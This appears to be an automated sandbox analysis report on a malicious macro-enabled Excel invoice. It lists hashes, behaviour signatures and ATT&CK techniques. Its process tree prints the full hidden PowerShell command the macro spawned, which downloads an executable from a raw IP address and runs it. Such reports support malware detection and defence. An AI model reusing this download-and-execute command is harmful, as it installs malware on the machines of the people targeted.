Analysis

  • max time kernel
    70s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-01-2023 07:30

General

  • Target

    invoice_78336.xlsm

  • Size

    42KB

  • MD5

    8588c1999a06ff9c06d12fee925b9018

  • SHA1

    af5ef23dbcc31847788d1a2522b689a8dfd0f124

  • SHA256

    c94cca2c1e58461023c08ac630cb28cb0940566373c8fa988c480736597a8840

  • SHA512

    62c175443fb7b0c58be53f84cdf78d441670eb1ecfed27d7c41f06505a8e036f81c4d7ea086c42cdfcf23d5256404dfccf2b6372fa1a538bbe66d8e54ac9305d

  • SSDEEP

    768:7lvRPlvHssndawBIJYfTH+niSpPvDH7iv+nW4FFiKk/f0qtM2CHWRQ+nYANm:ZvnvHTdawG1BxT7iv+PFFi3/8qahHWt+

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\invoice_78336.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://198.23.172.90/statement.exe" -OutFile $TempFile; Start-Process $TempFile;
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1512

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1512-61-0x0000000000000000-mapping.dmp
  • memory/1512-63-0x000000006C0B0000-0x000000006C65B000-memory.dmp
    Filesize

    5.7MB

  • memory/1512-65-0x000000006C0B0000-0x000000006C65B000-memory.dmp
    Filesize

    5.7MB

  • memory/2020-54-0x000000002FA21000-0x000000002FA24000-memory.dmp
    Filesize

    12KB

  • memory/2020-55-0x0000000071351000-0x0000000071353000-memory.dmp
    Filesize

    8KB

  • memory/2020-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2020-57-0x000000007233D000-0x0000000072348000-memory.dmp
    Filesize

    44KB

  • memory/2020-58-0x00000000751A1000-0x00000000751A3000-memory.dmp
    Filesize

    8KB

  • memory/2020-59-0x0000000000861000-0x0000000000865000-memory.dmp
    Filesize

    16KB

  • memory/2020-60-0x0000000000861000-0x0000000000865000-memory.dmp
    Filesize

    16KB

  • memory/2020-64-0x000000007233D000-0x0000000072348000-memory.dmp
    Filesize

    44KB